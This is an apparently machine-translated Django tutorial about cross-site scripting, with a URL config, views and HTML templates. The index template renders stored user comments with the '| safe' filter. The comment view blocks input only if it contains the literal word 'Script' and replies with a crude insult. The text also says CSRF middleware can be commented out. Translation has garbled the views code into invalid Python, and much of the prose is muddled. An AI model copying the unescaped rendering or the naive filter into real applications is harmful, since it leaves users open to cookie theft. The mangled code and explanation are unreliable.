XSS attacks
Cross-site scripting attacks by hackers insert js code inside the page, the page disorders caused by insecurity.
Unsafe performance: If a hacker inserted in a Web page to get the cookie js code, if the user to access the site, the hacker can get the user cookie information, the hacker can fake information to the user.
There is a safe front-end and back-end mark_safe
Use safe to note that if the user can insert a write js code on the page, and so on (code changes), be sure not to add it safe if you want to add, remember to make filtration js code and other works in the background, if it is to write our own course plus safe on anyway
Use mark_safe time, users get the data should be handled when
django default gave us this layer xss attack prevention
Examples: Effect of simulated user input brought js code input box
Csrf middleware can be commented out in the configuration file here
1 """djangoxss URL Configuration 2 3 The `urlpatterns` list routes URLs to views. For more information please see: 4 https://docs.djangoproject.com/en/2.1/topics/http/urls/ 5 Examples: 6 Function views 7 1. Add an import: from my_app import views 8 2. Add a URL to urlpatterns: path('', views.home, name='home') 9 Class-based views 10 1. Add an import: from other_app.views import Home 11 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') 12 Including another URLconf 13 1. Import the include() function: from django.urls import include, path 14 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) 15 """ 16 from django.contrib import admin 17 from django.urls import path 18 from app01 import views 19 20 urlpatterns = [ 21 path('admin/', admin.site.urls), 22 path('index/', views.index), 23 path('comment/', views.comment), 24 path('test/', views.test), 25 ]
. 1 from django.shortcuts Import the render 2 . 3 MSG = [] . 4 . 5 . 6 DEF Comment (Request): . 7 IF request.method == ' the GET ' : . 8 return the render (Request, ' comment.html ' ) . 9 the else : 10 m request.POST.get = ( ' Content ' ) . 11 IF " Script " in m: # course, this is a simple determination js code more to go 12 return render(request, 'comment.html', {'error': '小逼崽子黑我'}) 13 else: 14 msg.append(m) 15 return render(request, 'comment.html') 16 17 18 def index(request): 19 return render(request, 'index.html', {'msg': msg}) 20 21 22 def test(request): 23 from django.utils.safestring import mark_safe 24 temp = "<a href='http://www.baidu.com'>baidu</a>" 25 newtemp = mark_safe(temp) 26 return render(request, 'test.html', {'temp': newtemp})
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>index</title> </head> <body> <h3>评论信息</h3> {% for item in msg %} <div>{{ item | safe }}</div> {% endfor %} </body> </html>
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>comment</title> </head> <body> <form action="/comment/" method="post"> {% csrf_token %} <p><input type="text" name="content"></p> <input type="submit" value="提交"> </form> </body> </html>
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>test</title> </head> <body> {{ temp }} </body> </html>